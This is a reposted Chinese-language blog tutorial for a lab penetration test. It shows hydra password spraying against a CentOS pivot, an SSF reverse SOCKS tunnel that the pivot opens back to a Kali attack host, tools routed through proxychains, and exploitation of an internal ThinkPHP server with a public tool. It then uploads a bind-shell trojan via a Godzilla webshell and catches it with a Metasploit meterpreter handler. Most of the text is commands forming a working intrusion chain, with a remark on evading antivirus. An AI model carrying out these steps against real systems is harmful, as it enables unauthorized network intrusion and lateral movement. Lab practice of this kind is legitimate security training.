自学内容网 自学内容网

内网穿透-SSF内网穿透反向socks代理之渗透内网thinkphp主机上线msf

1 ssf 简介

Secure Socket Funneling socks正反向代理,linux版较好的免杀

1.1下载地址

https://github.com/securesocketfunneling/ssf

1.2下载编译好的执行文件

https://github.com/securesocketfunneling/ssf/releases/tag/3.0.0

2.环境

img

kali 攻击机 网卡 桥接模式 ip 192.168.1.6

跳板机 centos 网卡1 桥接模式 ip 192.168.1.8 网卡2 仅主机模式 ip 10.10.10.88

目标机器 win2012 网卡 仅主机模式 10.10.10.13

3.ssf socks 反向代理

3.0 kali 上执行hydra 密码喷洒获取centos的账号密码

3.1. wegt https://github.com/securesocketfunneling/ssf/releases/download/3.0.0/ssf-linux-x86_64-3.0.0.zip

3.2 解压

unzip ssf-linux-x86_64-3.0.0.zip

3.3.kali上运行,监听1616端口

./ssfd -p 1616 &

3.4跳板机运行ssf ,链接kali的1616端口并且在kali上开启1080端口监听

./ssf -F 1080 192.168.1.6 -p 1616 &

4.代理工具proxychains的设

vi /etc/proxychains4.conf

socks5 127.0.0.1 1080

5.自身不支持代理的渗透工具可以用proxychains设置代理渗透内部网络

5.1 内网桌面链接rdesktop

proxychains rdesktop 10.10.10.13

5.2 burp通过proxychains代理渗透内网

proxychains java -jar burpsuite.jar

5.3 火狐等浏览器设置代理

Network Settings-》settings-》Manual proxy configuration-》SOCKS Host 填写kali ip地址 192.168.1.6,端口是1080

5.4thinkphp 利用工具

github 搜索 thinkphp 综合利用

5.5 启动 thinkphp.jar

#proxychains /usr/local/jdk1.8.0_301/bin/java -jar ThinkPHP.jar

5.6 启动哥斯拉,设置代理,管理shell上传正向木马,运行木马

5.7利用代理启动msf

proxychains msfconsole

5.8正向链接内网的木马

msf6 > use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set rhost 10.10.10.13

set lport 1616

run


原文地址:https://blog.csdn.net/m0_63050933/article/details/143518210

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!